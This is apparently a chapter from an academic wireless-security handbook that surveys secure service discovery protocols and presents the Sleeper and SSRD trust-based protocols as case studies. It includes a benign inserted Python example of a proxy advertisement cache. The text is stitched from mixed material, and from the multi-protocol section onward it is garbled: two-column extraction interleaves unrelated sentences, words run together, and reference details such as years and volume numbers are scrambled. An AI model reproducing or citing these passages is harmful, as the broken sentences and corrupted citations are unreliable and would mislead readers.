Handbook of Research on

Wireless Security
Yan Zhang
Simula Research Laboratory, Norway

Jun Zheng
City University of New York, USA

Miao Ma
Hong Kong University of Science and Technology, Hong Kong

Volume I

Information Science Reference

Hershey • New York
Secure Service Discovery

mobile devices, but also for sharing of resources between devices. There are four elements found in the service-oriented approach: (1) service description, which provides an interchangeable way for devices to describe the service and its use; (2) service registration or advertisement on behalf of the service provider; (3) service discovery by devices seeking a service; and (4) service invocation, which is a protocol by which a service requester and service provider coordinate to deliver a service. Propagation of service advertisements can use pull (query), push (announcement), or a combination of pull and push. In addition, the ability to dynamically discover and combine component services to form new services is referred to as service composition.

Broadband wireless technologies such as WiMax, UWB, and 802.11n are bringing broadband connectivity to mobile CE devices. These devices will be able to switch between different network access technologies. This has the following consequences for service discovery in pervasive computing:

• Due to broadband connectivity, devices will be able to participate in media-rich and sophisticated resource sharing.
• Wide-area service discovery and location-based discovery will grow in importance due to the combination of increased connectivity and wide-area roaming.
• The ability to act as multi-homed devices means that devices will have increased connectivity but also an increased rate of transitions due to roaming between different networks.
• Devices will be able to simultaneously participate in a personal area network (PAN), home networks, and wireless area networks (WANs) with different security and trust properties. In PANs and home networks, mediation of service discovery between networks is needed, in which devices such as gateways proxy or intermediate service discovery between network domains.
• Device-to-device interaction will grow in importance to users for applications such as content sharing, communication, and gaming.

Due to these trends, richer models of discovery are being considered such as federated discovery, meta discovery, and semantic discovery (Buford, Brown, & Kolberg, 2006; Buford, Celebi, & Frankl, 2006).

Consequently, it is important for wireless devices to securely participate in service discovery with other devices that are outside the immediate administrative security domain. Further, these devices interact with other devices in an ad hoc [...] leads to the dependency on other devices for resources. The nature of devices, communication patterns, and dependency on other devices in turn causes security vulnerabilities. Due to the ad hoc connectivity and dynamic nature of the population [...] intermittent and short-lived. Moreover, multiple devices [...] responsive service discovery model.

Thus far, we have discussed the general view of and motivation for service discovery for mobile devices. The rest of the chapter is organized as follows: The next section summarizes the security goals for service discovery and presents a model for service discovery in pervasive computing. The third section surveys present unsecured service discovery models. The fourth section surveys existing secure service discovery models, organized into three different categories. Two case studies of service discovery protocols that incorporate trust-based mechanisms are described in the [...] sections summarize important research issues and conclusions.

[...]

[...] discovery is well established (Matsumiya et al., 2004; Stajano, 2002; Stajano & Anderson, 2002). Privacy, security, and trust issues in service discovery in the
pervasive computing area are of utmost importance (Robinson et al., 2005). Thus, the service discovery process demands models that ensure the privacy and security of the user. In particular, this privacy and security should encompass:

• Authentication: Do the user and device actually have the indicated identity?
• Authorization: Does the user have access rights for issuing service advertisements, requesting services, and invoking services?
• Trust: Are the participating user and device trusted? Are the service and its components trusted?
• Privacy: Is only the approved information shared between the given users/devices during service discovery, advertisement and invocation (SDAI) operations? Is disclosure to unauthorized users prevented?
• Vulnerability to attack and misuse: Are the SDAI operations protected from attacks such as denial-of-service, spoofing, replay, and man-in-the-middle? Are the SDAI operations protected from misuse in enabling such attacks on other network components?

An important question is what security, privacy, and trust mechanisms are provided by the wireless network. IEEE 802.11i, the basis of WiFi Protected Access 2 (WPA2), replaced Wired Equivalent Privacy (WEP) with stronger encryption and a new authentication mechanism incorporating an authentication server such as remote authentication dial in user service (RADIUS). This mechanism, while suitable for enterprise deployment, has had limited use in home networks because of complex administration and in public hot spots due to the difficulty of administering shared keys. Thus, in the best case, a set of devices are authenticated in a single administrative domain, and the authentication server can be used to support authorization policies, including policies related to service discovery and use. Network packets between authenticated users are encrypted, providing communication privacy from non-authenticated parties. However, these security capabilities cover only a subset of the aforementioned security goals and are limited to single administrative domains. For interactions crossing administrative boundaries, or without infrastructure support, other mechanisms are needed.

Further, traditional security mechanisms do not work well in this environment because the devices are computationally limited and the notion of physical security is not applicable (Kagal, Finin, & Joshi, 2001). Then, considering the choices of totally sacrificing security versus imposing a full-fledged security structure similar to that of desktops and laptops, the question is whether there is any middle ground. Ensuring varying levels of security for various services is a research challenge. The insufficiency of user/device identity for trust is another concern in designing a discovery model, and techniques for peer trust and risk assessment (Chen, Jensen, Gray, Cahill, & Seigneur, 2003) are important tools to address this.

Desired characteristics of a secure and private service discovery model are summarized next.

• Adaptive: The trust value and security level should be adaptable depending on the service itself, the service provider, and the service requester.
• Trust reliant: The model should consider trust relationships among devices. Where no prior information is available, reputation, recommendation, or trust negotiation schemes can be used. If these are unsuitable, then risk assessment can be used.
• Infrastructure independence: No infrastructure support (e.g., powerful servers, proxies) should be required. The model should work independently without any external support, but be able to leverage infrastructure where it exists.
• Lightweight: The model should be lightweight in terms of executable file size.
• Service oriented: To control service security modularly, service discovery models should be service oriented.
• Graceful performance degradation: The model should not put much overhead on the performance of the device, and performance should degrade gracefully for more advanced security features.
• Energy efficient: Service discovery models should be energy conserving, for example, avoiding continuous broadcasting or polling.

A classification and detailed survey of service discovery models can be found in Zhu, Mutka, and Ni (2002). Service-oriented architectures (SOA) and their security are discussed in Cotroneo, Graziano, and Russo (2004). We classify existing service discovery models into two broad categories. First are service discovery models that do not address security issues (Balazinska, Balakrishnan, & Karger, 2002; Microsoft, 2000; Miller, Nixon, Tai, & Wood, 2001; Nidd, 2001; Winoto, Schwartz, Balakrishnan, & Lilley, 1999). Second, there are models that consider a full-fledged security mechanism with the help of infrastructure support (Czerwinski, Zhao, Hodes, Joseph, & Katz, 1999; Zhu, Mutka, & Ni, 2003, 2004). The next two sections discuss examples of these cases, and Table 1 compares the key features of the surveyed systems.

SERVICE DISCOVERY MODELS WITHOUT INHERENT SECURITY

We describe several designs that do not address security requirements. Nevertheless these models are important either because the systems are widely used, are representative approaches, or could be secured by additional mechanisms in a secure network. The designs we discuss are Bluetooth, DEAPSpace, and Intentional Naming System (INS).

Bluetooth (Bluetooth Special Interest Group [SIG], 2001a, 2001b) is a pull protocol. Device information, services, and the characteristics of the services are queried and connections between two or more Bluetooth devices are established. This facilitates user selection, scope-awareness, and both unicast and broadcast communication. A Bluetooth device returns all matched resource information.

Nidd (2001) developed the DEAPSpace service discovery method for ad hoc and mobile device applications. Each node broadcasts its advertisement of local services. After receiving a broadcast, each node updates its service list with information about the other nodes' services. This service information is included in that node's subsequent broadcast. Each node is a broadcaster, and DEAPSpace uses contention timers at each node so that a node will randomly delay its broadcast after another broadcast is received. DEAPSpace can reduce service discovery time at the cost of increased bandwidth and power consumption.

INS (Winoto et al., 1999) supports both pull and push delivery of service advertisements. It also supports unicast, anycast, and broadcast methods. It offers the best-match resource information and also provides facilities for limited support of context information. In INS each device asks a central name resolver for the type of service it requires, and the resolver replies with the best matched device address.

SECURE SERVICE DISCOVERY MODELS

Most contemporary service discovery models fall into this category. There are some models that include full-fledged security mechanisms, while others rely on simple algorithms for limited security. This category can be subdivided into infrastructure based, infr astructureless, hardware based, and smart-space-oriented security mechanisms. In the following subsections we discuss each of these categories.

Infrastructure-Based Security

UPnP is a specification for connecting multiple devices on a home network so that these devices can invoke services of each other. UPnP defines a set of protocols and a service description format. In addition, UPnP standardizes various service interfaces. UPnP relies on administratively scoped multicast IP addresses for service discovery, service advertisement, and event delivery. Each UPnP device broadcasts its advertisements when it connects to the network. Thereafter, a UPnP device broadcasts advertisements in response to queries from other devices. These queries may be for all services on the network or a specific service on
the network. The UPnP Device Security specification defines security mechanisms for simple object access protocol (SOAP)-based service invocation, but does not address simple service discovery protocol (SSDP) security.

Table 1. Comparison of secure service discovery models: SSDS (Czerwinski et al., 1999), Ninja (Goldberg, Gribble, Wagner, & Brewer, 1999; Gribble et al., 2001), UPnP (Miller et al., 2001), SPDP (Almenarez & Campo, 2003), Progressive Exposure (Zhu et al., 2004; Zhu, Mutka, & Ni, 2006), Splendor (Kagal, Korolev, Chen, Joshi, & Finin, 2001), Jini (Sun Microsystems, 2001), CSAS (Minami & Kotz, 2005), CSM (Brezillon & Mostefaoui, 2004), AVCM (Shankar & Arbaugh, 2002), CSRA (Tripathi, Ahmed, Kulkarni, Kumar, & Kashiramka, 2004), TRAC (Basu & Callaghan, 2005), SME (Kopp, Lucke, & Tavangarian, 2005), HCA (Pearson, 2005), SSRD (Sharmin, Ahmed, & Ahamed, 2006a), SSRD+ (Sharmin, Ahmed, & Ahamed, 2006b), Centaurus2 (Undercoffer, Perich, Cedilnik, Kagal, & Joshi, 2003), SLP (Barbeau, 1999; Guttman, Perkins, Veizades, & Day, 1999), Sleeper (Buford, Celebi, et al., 2006)

Model                 Adaptive  Infrastructure  Service-  Lightweight  Trust    Privacy  Context  Smart space
                                support needed  oriented               aware    aware    aware    needed
SSDS                  No        Yes             No        No           N/A      N/A      N/A      No
Ninja                 No        Yes             No        No           N/A      N/A      N/A      No
UPnP                  No        N/A             No        No           No       Yes      No       Limited
SPDP                  No        No              Yes       No           Yes      N/A      No       No
Progressive Exposure  No        Yes             No        No           No       Yes      Limited  No
Splendor              No        Yes             No        No           Yes      Yes      N/A      No
Jini                  No        N/A             No        No           N/A      Yes      N/A      Limited
CSAS                  No        No              Yes       No           N/A      N/A      Yes      No
CSM                   Yes       No              Yes       No           N/A      N/A      Yes      No
AVCM                  Limited   No              Yes       No           Yes      Yes      Yes      No
CSRA                  No        Yes             No        No           N/A      N/A      Yes      Yes
TRAC                  No        N/A             No        No           Yes      Yes      N/A      Yes
SME                   Yes       N/A             N/A       Yes          N/A      Yes      No       N/A
HCA                   No        N/A             Yes       No           No       Yes      No       N/A
SSRD                  Yes       No              Yes       Yes          Yes      Yes      Limited  No
SSRD+                 Yes       No              Yes       Yes          Yes      Limited  Yes      No
Centaurus             Yes       Yes             No        No           No       N/A      Yes      No
SLP                   No        Yes             Yes       Yes          No       No       No       No
Sleeper               Yes       No              Yes       Yes          Yes      Yes      No       No

As an extension of project Centaurus (Kagal, Korolev, Avancha, et al., 2001; Kagal, Korolev, Chen, et al., 2001), Centaurus2 (Undercoffer et al., 2003) provides a secure mechanism for service discovery and enables users to access services across heterogeneous network domains. The system uses a local certificate authority (CA) and each entity must be pre-registered in the system. The CA issues a certificate to each identified and verified entity. The design of Centaurus2 includes four components, and each component has a separate private key which is stored at the client using PKCS #11:

1. The local CA is responsible for issuing digital certificates and for validating these digital certificates.
2. The communication manager mediates communication between clients and networked services.
3. Group membership(s) is maintained and stored by the capability manager.
4. Each client is registered to a specific service manager that ensures security and access rights, and mediates between user client and service client. Service managers maintain a service registry.

Each domain has a root service manager. Static bridges are configured between service managers in different domains. Then clients in separate domains can access services across domains using the root service manager as the context.

In SSDS (Czerwinski et al., 1999), both service advertisement pull (query) and push (announcement) are supported. Service advertisements are stored in a hierarchy of servers. SSDS provides capability-based access control. All information passed between clients and servers is encrypted. A single copy of the resource information is stored and accessed, which makes the system vulnerable to a single point of failure. Subsequently, the Ninja project (Goldberg et al., 1999; Gribble et al., 2001) added the concept of secure identification of service through SSDS. In Ninja, the CA issues valid certificates and the capability manager authorizes user access to a particular resource. The service providers can also prescribe the conditions (capabilities) that are needed by a user in order to discover a particular service.

The context-sensitive authorization scheme (CSAS) (Minami & Kotz, 2005) provides authorization without a central server or CA. When a CSAS user wants to access a service from a resource, the associated server issues a logical authentication query and sends it to the host of the resource. Each host has a knowledge domain with which it attempts to prove the authorization query. If it fails, it distributes several portions of the proof to multiple hosts. Through this distribution CSAS reduces the computational overhead on any single node. After collecting the sub-proofs from the other hosts, the host of the resource can declare the result of the query to be true or false, thus indicating grant of access or denial respectively. This approach facilitates confidentiality, integrity, and scalability. To authorize access, CSAS uses previously stored information, which may be difficult to collect for users in an ad hoc network.

Splendor (Zhu et al., 2003) is a secure, private, and location-aware service discovery protocol. Splendor adapts depending on the network environment to use either a client-service model or a client-service-directory model. Proxies are used to offload workload for mobile services. Mobile services authenticate with proxies and proxies handle registration. In these situations, proxies are considered to be trusted servers. However, if no trusted server is available in an environment, then there is no agent to handle the registration. Its security model is based on mutual authentication.

Progressive Exposure (Zhu et al., 2004, 2006) is a secure service discovery approach. It addresses privacy issues using a mutual matching technique. Progressive Exposure addresses security and fairness by not exposing too much information. In each round of message exchange between communicating parties, it tries to find whether any mismatch occurs. In case of a mismatch, the communication stops. It uses one-time code words and a hash-based message authentication code. It considers the presence of one user and one service provider, but it does not address situations in which many users and many service providers are present. When a service provider leaves the network, the process of provider lookup and the authentication phase is restarted. It provides privacy for service information, requests, domain identity, and user credentials, and is based on the client-service-directory model.

Infrastructure-Less Security

SPDP (Almenarez & Campo, 2003) is a secure service discovery protocol based on the PTM (Almenarez, Marin, Campo, & Garcia, 2004; Almenarez, Marin, Dyaz, & Sanchez, 2006) model. The need for a centralized server is avoided by having each device act as its own CA. For a service request, this model uses broadcast messaging. The requesting device updates its cache after getting a
reply from the devices (if any reply). It then stores the device identities that it believes trustworthy. The devices' user agents continually listen for messages, which in turn means continual energy consumption.

Shankar and Arbaugh (2002) propose an attribute vector calculus (AVCM) for modeling trust. Their model describes both identity-based trust and context-based trust and is one of the first models that discusses the importance of trust in a ubiquitous environment. Brezillon and Mostefaoui (2004) present a context-based security model (CSM) and they discuss the need for adaptive security based on the particular situation. Thomas and Sandhu (2004) present the challenges and research issues for secure pervasive computing. They express the need for a dynamic trust model as the pervasive computing environment poses new kinds of security challenges due to its diverse nature. They present a socio-technical view.

Smart Space Dependent Security

A smart space provides devices with complex computational support that supports context-awareness and collaboration. Components of the smart space can offload secure discovery tasks and relate them to other activities in the space. Examples include context-based secure resource access (CSRA) (Tripathi et al., 2004) and trust-based architecture (TRAC) (Basu & Callaghan, 2005).

CSRA (Tripathi et al., 2004) focuses on context-aware discovery of resources and how to access resources in a secure and unobtrusive manner. In a pervasive computing environment the rules and limitations imposed by the user, system, and the collaborative activity scenario have to be combined dynamically at runtime. CSRA uses a namespace related to each user and domain. These namespaces collect resources, services, and activities. The binding protocol defines the association of a user to a specific resource in the space. The binding changes based on the contextual information of the user including the location, activity, and role. A descriptor is associated with each namespace that combines functional attributes collected from resource descriptions in Web services description language (WSDL) and resource description framework (RDF), conditions for security, and policies for the binding protocol. The binding protocol specifies whether the binding of a resource is "shared" or "private," and whether the binding is "permanent" or "context-based."

Basu and Callaghan (2005) present TRAC for increasing security and user confidence in pervasive computing systems. They use trust and role-based access control for ensuring security and privacy. However, their model is aimed at an intelligent environment (IE) only. This policy-based model allows users to define policies for themselves and thus gives users control to define their own security level. This model works in an IE because every user is known beforehand. However, in a truly pervasive environment it is not possible to have prior information about every user and thus this model is not applicable.

EXAMPLES USING TRUST MODELS

We next describe two service discovery protocols, Sleeper and SSRD, which incorporate trust models for infrastructure-less security.

Sleeper

Sleeper (Buford, Celebi, et al., 2006) is an energy-preserving service discovery protocol which features dynamic proxy selection for advertisement and discovery so that nodes can go to power standby while the proxy advertises on their behalf. The basic node states and transitions for Sleeper are shown in Figure 2. An off-line or disconnected node moves to an online state and broadcasts a join message that includes its advertisements and their popularity metrics. The current proxy caches these advertisements. Any proxy-candidate node may also cache these advertisements. An online node may broadcast a leave message prior to going off-line; if a leave message is not transmitted, advertisements may be purged from the proxy and other online nodes' caches by expiration. Transitions to/from standby state may also be indicated by broadcast messages.

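The join/leave/standby/expiration handling just described, as an added example written for this page (it is not code from Buford et al. or from any Sleeper implementation). It models only the proxy's advertisement cache: a join carries advertisements with their popularity metric, a leave removes the node's entries, standby transitions flag entries without discarding them, and entries of a node that went off-line without sending a leave are purged by expiration. The message field names, the per-advertisement lifetime used as the expiration rule, and the popularity-ordered lookup are assumptions made for the example; the sample nodes and timings are constructed.

```python
"""Sleeper-style proxy advertisement cache (illustrative; not the Sleeper code).

Assumptions made for this example: a JOIN carries a list of advertisements,
each with a popularity metric and a lifetime (seconds) after which the proxy
drops the entry unless it is refreshed by a new JOIN; LEAVE removes all of a
node's entries; STANDBY/ONLINE only flag reachability so the proxy keeps
advertising on the node's behalf. Time is passed in explicitly so the
scenario is deterministic.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Advertisement:
    node_id: str
    service: str        # service type, e.g. "print"
    popularity: int     # popularity metric carried in the JOIN message
    lifetime: float     # assumed: seconds the entry stays valid without refresh


@dataclass
class CacheEntry:
    ad: Advertisement
    expires_at: float
    standby: bool = False   # node is in standby; proxy still advertises for it


class ProxyCache:
    """Advertisement cache kept by the proxy (proxy-candidates may keep a copy)."""

    def __init__(self) -> None:
        self._entries: dict[tuple[str, str], CacheEntry] = {}

    def on_join(self, ads: list[Advertisement], now: float) -> None:
        """JOIN (or re-JOIN) replaces the node's entries and resets their expiry."""
        for ad in ads:
            self._entries[(ad.node_id, ad.service)] = CacheEntry(ad, now + ad.lifetime)

    def on_leave(self, node_id: str) -> int:
        """LEAVE: drop everything the node advertised; returns the number dropped."""
        keys = [k for k in self._entries if k[0] == node_id]
        for k in keys:
            del self._entries[k]
        return len(keys)

    def on_standby(self, node_id: str, standby: bool) -> None:
        """STANDBY/ONLINE transition: keep the entries, just flag reachability."""
        for (nid, _), entry in self._entries.items():
            if nid == node_id:
                entry.standby = standby

    def purge_expired(self, now: float) -> int:
        """Drop entries whose lifetime ran out (node vanished without a LEAVE)."""
        expired = [k for k, e in self._entries.items() if e.expires_at <= now]
        for k in expired:
            del self._entries[k]
        return len(expired)

    def lookup(self, service: str, now: float, include_standby: bool = True) -> list[Advertisement]:
        """Answer a discovery query from the cache, most popular first."""
        self.purge_expired(now)
        hits = [e.ad for (_, svc), e in self._entries.items()
                if svc == service and (include_standby or not e.standby)]
        return sorted(hits, key=lambda a: (-a.popularity, a.node_id))


def scenario() -> dict:
    """Constructed scenario: two nodes join, one sleeps, one leaves, one vanishes."""
    cache = ProxyCache()
    a_print = Advertisement("node-A", "print", popularity=5, lifetime=30.0)
    b_print = Advertisement("node-B", "print", popularity=9, lifetime=30.0)
    b_photo = Advertisement("node-B", "photo-share", popularity=2, lifetime=30.0)
    out: dict = {}

    cache.on_join([a_print], now=0.0)
    cache.on_join([b_print, b_photo], now=5.0)
    out["initial"] = [ad.node_id for ad in cache.lookup("print", now=6.0)]

    cache.on_standby("node-B", standby=True)       # B sleeps; proxy still answers for it
    out["awake_only"] = [ad.node_id for ad in cache.lookup("print", now=7.0, include_standby=False)]
    cache.on_standby("node-B", standby=False)

    out["a_dropped"] = cache.on_leave("node-A")     # A announces its departure
    out["after_leave"] = [ad.node_id for ad in cache.lookup("print", now=8.0)]

    # B goes off-line without a LEAVE: its entries survive until 5.0 + 30.0 = 35.0
    out["before_expiry"] = len(cache.lookup("photo-share", now=34.9))
    out["purged"] = cache.purge_expired(now=35.0)
    out["after_expiry"] = cache.lookup("print", now=36.0)
    return out


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value}")
```

The lifetime-based purge is what bounds the damage of a silent departure: without it, a proxy would keep answering discovery queries for a node that is gone, and a node that never sends a leave (crash, battery exhaustion, or a deliberately noisy joiner) would pin stale entries in every cache.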
An online node can be in one of four states (Figure 2). Every node initially goes online as a non-proxy node. A proxy-capable node becomes a proxy-candidate. There may be more than one proxy-candidate at any time. When no proxy is detected, for example by absence of a service advertisement broadcast or at the exit of a proxy, the first proxy-candidate to issue the proxy bootstrap becomes the proxy. A vacating proxy may transfer its cache to the new proxy, or the new proxy may collect advertisements from online nodes through the bootstrap. Nodes which are in standby state during the proxy change may be polled by the new proxy after the standby node transitions to online.

Sleeper uses property-based peer trust to secure service discovery operations. In property-based or credential-based trust (Hess et al., 2002; Seamons, Winslett, & Yu, 2001), each party has a set of certified attributes (e.g., credit card numbers, employee ID) that are exchanged to establish mutual trust. The typical components of a mechanism to provide property-based trust include:

• Trust negotiation protocol
• Trust negotiation policies
• Credentials

A method for trust negotiation has been defined for the client-server context (Hess et al., 2002; Seamons et al., 2001). In this design, access control policies determine which credentials, services, and policies should be disclosed during a negotiation. Policies and credentials are secured locally at each node but are disclosed during negotiation to the remote party. Sleeper nodes establish mutual trust using the trust negotiation mechanism defined in Buford, Park, and Perkins (2006). Assuming that each peer caches public keys for the certificate issuers that are relevant to its peer trust policies, peer trust establishment can be performed without a centralized authority. A service discovery mechanism is privacy preserving if a peer can discover the service description using the mechanism only if the peer satisfies the criteria C. Thus a mechanism that only distributes service descriptions to peers which are members of group G with criteria C is privacy preserving. Sleeper uses trust negotiation to create groups of peers that satisfy membership criteria C. Group management is provided by a group service (GS) that is available at every peer. The GS caches private service descriptions for each group and allows only group members to retrieve them. The GS publishes encrypted service descriptions that can only be decrypted by members of G. These encrypted service descriptions are broadcast to all connected peers, but can only be decrypted by group members.

The secure agent technology (Buford, Park, et al., 2006) used in Sleeper for trust negotiation can also be used for enabling trust in service composition (Buford, Kumar, & Perkins, 2006).

Figure 2. Sleeper node states and state transitions; online nodes can be in one of four states (Buford et al., 2006)

SSRD

With a view to ensuring enhanced security through a lightweight solution for resource discovery in a pervasive environment, simple and secure resource discovery (SSRD) has been proposed by the researchers in Sharmin et al. (2006a). The fundamental part of the solution is a trust-based, service-oriented adaptive security mechanism built on middleware adaptability for resource discovery, knowledge usability, and self-healing (MARKS), a middleware and framework developed for resource constrained pervasive devices for pervasive applications (Sharmin et al., 2006b). The SSRD unit of
MARKS consists of trust management and security management sub units and it provides a resource discovery agent (Figure 4).

Figure 3. Sleeper groups in broadcast of advertisements; symmetric keys are broadcast with public key encryption (Buford, Celebi, et al., 2006)

Figure 4. Resource discovery model (Sharmin et al., 2006a)

The trust management unit is responsible for maintaining trust relationships with other devices. It calculates trust values for the relationships between devices and also updates the trust values depending on the behavior of the service provider or requester. It maintains a list of service-specific average trust values and communicates with the security management unit whenever necessary. Trust values are quantified in the range of 0.0 to 1.0 to represent the degree of trustworthiness of a node. Complete trust and complete distrust are represented by 1.0 and 0.0 respectively. A new device with no prior interaction record is assigned a value of 0.5, which indicates a neutral condition. Trust is a dynamic property: it evolves over time and may possess the asymmetric transitive property depending on the service. Each owner or manager of a device retains a table that indicates the security level (ranging from 1 to 10) required by each of the available services or applications. The resource manager consults "Service-trust" for all the neighboring nodes to decide whether the service could be provided. For example, for services with security level < 5, no trust calculation or secure communication is needed. For services with higher security levels, trust is calculated first and then secure communication is established between the provider and the requester. This lessens both the computation cost and the communication overhead.

Trust models are designed to associate each device with a trust value based on past behavior with the requesting device. Also, when we calculate a trust value for an unknown device, we consider the PGP (Zimmermann, 1995) based trust model. PGP is based on mutual certification of the validity of the keys. When a new device joins the network, or a device that has never communicated with a service-providing device contacts it, the service-providing device generates a multicast message to all devices that it has interacted with and asks for their recommendation about this device. From the recommendations the trust value is calculated for that service. The issue of dynamic update of trust values has been addressed more clearly with specific situations in the researchers' enhanced adaptation of this model named SSRD+ (Sharmin, Ahmed, & Ahamed, 2006c).

FUTURE RESEARCH

The open and dynamic nature of the pervasive computing environment requires a security mechanism
that is unobtrusive to the user and makes it possible to securely provide and discover the services available for the user in a transparent manner. Some of the open issues regarding challenges in secure and private service discovery are highlighted in this section.

Privacy

Although contextual information plays a pivotal role in dynamic pervasive environments, it may also expose private information. When granting access to a service, a person's context information like location, time, and activity can be exposed. Further, policies and constraints are themselves subject to privacy protection. Private information management, such as the recursive constraint based security model in Hengartner and Steenkiste (2006), is one approach to prevent direct information leakage. However, such mechanisms are generally susceptible to attacks involving collusion and inference.

In a context- and location-sensitive medical application, researchers developed a system for practitioners to easily share context in their work tasks. Subsequently, questions of privacy led the designers to limit access to this information. As another example, the Gaia project has shown a privacy preserving hop by hop routing algorithm that carries information about the location of the user but does not reveal the exact location or identity of the user. Thus the privacy level and willingness of disclosure of personal information varies depending on information type, collection method, time, and other factors. In some scenarios users are reluctant to disclose identity information but do not care about location information. The situation might be reversed in other cases. Formulation of policies that are understood and can be managed by users is an important goal.

Trust

As discussed earlier, a key element for secure service discovery in ad hoc environments is the ability to establish a level of trust between peers. The trust life cycle can be summarized as trust formation, evolution, and exploitation. In general, trust is formed by experience through earlier interactions, verifiable properties of a party, recommendations from trusted entities, and reputation in a community. The challenges faced during trust establishment are due to the absence of a global trust framework, the large number of autonomous and anonymous entities, the large number of domains, and different trust requirements for a large number of application contexts.

Recent context-aware trust models focus on dynamic trust values, which are updated over time and distance and incorporate behavioral models for the evolution of trust. Risk analysis maps each action to possible outcomes associated with a cost/benefit. Decisions consider the likelihood of the risk and its cost. Unresolved issues in trust establishment include detecting and preventing collusion, managing the trade-off between privacy and property disclosure, and efficient trust mechanisms in large communities.

Multi-Protocol Environments

The combination of multi-homed mobile devices and multiple service discovery protocols means that service access may cross not only administrative boundaries but also different service discovery domains with varying security properties. As an example, a mobile device may include protocol support for Bluetooth, SLP, and UPnP. Then the device can easily discover services in the different domains that it roams to, even if these domains use different service discovery protocols. As a multi-homed device, it may simultaneously connect to domains with different service discovery protocols.

As a second example, a single user may have a set of personal mobile devices configured in a PAN. These devices can use the PAN security mechanism for security and privacy control, and identity-based authentication for mutual trust. The PAN may support a specific service discovery protocol. One or more of the devices in the PAN may also connect to outside networks with different service discovery protocols and security mechanisms.

These types of scenarios indicate that future mobile devices may need to operate in multiple
Figure5.ConceptualdiagramofSSRDmodel(Sharminetal.,206b)

security contexts. In these cases there is the po- services that may be created from different service
tentialforconflictingaccesspolicies - andunantici
sources. Composition trust bindings (Buford, Ku-
patedinformationows fl betweendifferent mar, regions.
et al., 2006) are one approach for providing
Further, there are challenges in managing groups trust in both control and data paths in peer-to-peer
across domains and mapping service semantics service composition.
and identities between different domains.

trust in service composition conclusIon

A device in a pervasive computing environment The general availability of broadband-wireless-


may offer a service to other devices. The service enabled devices is a key catalyst in enabling many
may be aggregated from services offered by other powerful peer-to-peer usage patterns, which have
devices. By aggregating service facilities across been described as pervasive computing. However,
devices, a collection of limited-resource devices these usage scenarios will frequently involve de-
may be able to offer services that would otherwise vices which are outside a single secure administra-
not be available. However, devices which invoke tive boundary and may include ad hoc interactions
or participate in these services may be concerned where no prior trust relationship exists. Further,
about the integrity and trustworthiness of the vari- thereissignificantvariationinbasicauthentic
ous components that are combined to provide these authorization, and privacy mechanisms offered in
services. Existing service discovery mechanisms wireless networks. Consequently many existing
do not expose such nested or recursive relationships designs for service discovery have insufficient
when a service is offered or invoked. security, privacy, and trust support.
Conventional methods for assuring trustwor- Assuming that most wireless networks will
thiness of software components are typically in the future provide encrypted transmission,
used to convey trustworthiness to the end user or user/device authentication, and authorization
developer. They provide no explicit representation control in a given administrative domain, there
of trust between distributed components. Further, remain important security related questions for
these methods do not explicitly validate composite service discovery in cross-domain cases, in ad hoc


Secure Service Discovery

cases, and when the devices/users are not a priori WorkshoponIntelligentEnvironments(IE0502 ) 5


mutually authenticated. Consequently, we do not (pp. 223-229).
expect that improvements in the security of wire-
Bluetooth Special Interest Group. (2001a). Speci-
lessnetworks,whileimportant,willbesufficient
fication of the Bluetooth system—Core [Version
toaddressalltherequirementsidentifiedherefor
1.1].
secure service discovery.
Toward this end, after surveying a variety of Bluetooth Special Interest Group. (2001b). Speci-
approaches to secure service discovery today, fication of the Bluetooth system—Core [Version
we presented case studies of two recent service ]. . 1 . 1 SDPspecification(Vol.1partE).
discovery protocols, which include trust establish-
ment mechanisms to enable trust between a priori Brezillon, P., & Mostefaoui, G. (2004). Context-
untrusted devices and peers. We also provided a based security policies: A new modeling approach.
summary of future research directions. In Second IEEE International Conference on
Pervasive Computing and Communications-work-
shops (pp. 154-158).
rEfErEncEs Buford, J., Brown, A., & Kolberg, M. (2006). Meta
service discovery. In Proceedings of the Fourth
Almenarez, F., & Campo, C. (2003). SPDP: A secure IEEE Conference on Pervasive Computing and
service discovery protocol for ad-hoc networks. In Communications Workshops, Workshop on Mobile
Ninth Open European Summer School and IFIP Peer-to-peer (pp. 124-129).
Workshop on Next Generation Networks (EUNICE
2003) (pp. 213-218). Buford, J., Burg, B., Celebi, E., & Frankl, P. (2006).
Sleeper: A power-conserving service discovery
Almenarez, F., Marin, A., Campo, C., & Garcia, C. protocol. In Third Annual International Conference
(2004). PTM: A pervasive trust management model on Mobile and Ubiquitous Systems, Networking,
for dynamic open environments. In Pervasive and Services (Mobiquitous)026 (pp. 1-10).
Security, Privacy, and Trust (PSPT 2004).
Buford, J., Celebi, E., & Frankl, P. (2006). Property-
Almenarez, F., Marin, A., Dyaz, D., & Sanchez, based peer trust in the sleeper service discovery pro-
J. (2006). Developing a model for trust manage- tocol. In 30th Annual International Computer Soft-
ment in pervasive devices. In Fourth Annual IEEE wareandApplicationsConferenceCOMPSAC ( ’0, ) 6
International Conference on Pervasive Computing Workshop on Security, Privacy, and Trust for
andCommunicationsWorkshops(PERCOMW’0) 6 PervasiveApplicationsSPTPA ( (Vol.
) 026 2, pp.
(pp. 267-271). 209-214).
Balazinska, M., Balakrishnan, H., & Karger, D. Buford, J., Kumar, R., & Perkins, G. (2006). Com-
(2002). INS/Twine: A scalable peer-to-peer ar- position trust bindings in pervasive computing
chitecture for intentional resource discovery. In service composition. In Proceedings of the Fourth
International Conference on Pervasive Computing IEEE Conference on Pervasive Computing and
(pp. 195-210). Communications Workshops, Workshop on Per-
vasive Computing and Communication Security
Barbeau, M. (1999). Service discovery in a mobile
(PerSec) (pp. 261-266).
agent API using SLP. In Global Telecommunica-
tionsConferenceGLOBECOM ( ’9(Vol.
)9 1a, pp.Buford, J., Park, I., & Perkins, G. (2006). Social
391-395). certificates and trust negotiation. Third IEEE In
Consumer Communications and Networking
Basu, J., & Callaghan, V. (2005). Towards a trust
Conference (CCNC 026 ) (pp. 615-619).
basedapproachtosecurityanduserconfidencein
pervasive computing systems. In IEE International

Chen, Y., Jensen, C., Gray, E., Cahill, V., & Seigneur, J. (2003). A general risk assessment of security in pervasive computing (Tech. Rep. No. TCD-CS-2003-45). The University of Dublin, Trinity College, Department of Computer Science.

Cotroneo, D., Graziano, A., & Russo, S. (2004). Security requirements in service oriented architectures for ubiquitous computing. In Proceedings of the Second Workshop on Middleware for Pervasive and Ad-hoc Computing (pp. 172-177).

